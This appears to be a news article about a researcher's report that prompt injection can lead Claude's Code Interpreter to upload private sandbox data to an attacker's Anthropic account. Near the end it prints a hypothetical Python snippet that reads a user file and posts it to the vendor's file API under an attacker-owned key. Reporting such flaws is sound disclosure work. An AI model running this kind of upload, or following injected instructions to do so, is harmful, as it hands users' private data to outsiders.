Claude can be tricked into sending your company’s private data to hackers; all it takes is a few kind words.



  • Claude’s Code Interpreter can be exploited to leak private user data via prompt injection
  • The researcher tricked Claude into uploading sandbox data to his own Anthropic account using API access
  • Anthropic now treats these flaws as reportable vulnerabilities and encourages users to monitor Claude’s activity or disable network access.

Claude, one of the most popular AI tools out there, has a vulnerability that allows threat actors to exfiltrate users’ private data, experts have warned.

Cybersecurity researcher Johann Rehberger, also known as Wunderwuzzi, recently published an in-depth report on his findings. The core of the problem, he found, is Claude’s Code Interpreter: a sandboxed environment that lets the AI write and execute code (for example, to analyze data or generate files) directly within a conversation.
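To make the mechanism concrete, here is a minimal, hypothetical sketch of the kind of code an injected prompt could persuade the interpreter to run inside its sandbox. The endpoint, header values, and file path are illustrative assumptions for this sketch, not details taken from Rehberger’s report; the key point is that the request authenticates with an attacker-controlled API key, so the uploaded data lands in the attacker’s account.

```python
# Hypothetical sketch of an exfiltration payload an injected prompt might
# ask the sandbox to execute. Endpoint, headers, and path are assumptions.
import requests

ATTACKER_API_KEY = "sk-ant-attacker-key"    # placeholder: key owned by the attacker
SANDBOX_FILE = "/mnt/user-data/report.csv"  # placeholder: user data inside the sandbox

with open(SANDBOX_FILE, "rb") as f:
    resp = requests.post(
        "https://api.anthropic.com/v1/files",  # file-upload endpoint (assumed)
        headers={
            "x-api-key": ATTACKER_API_KEY,     # authenticates as the attacker, not the victim
            "anthropic-version": "2023-06-01",
        },
        files={"file": f},                     # multipart upload of the sandbox file
    )

print(resp.status_code)
```

Because the sandbox is allowed to reach the vendor’s own API, traffic like this looks routine, which is what makes the technique hard to spot without monitoring.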


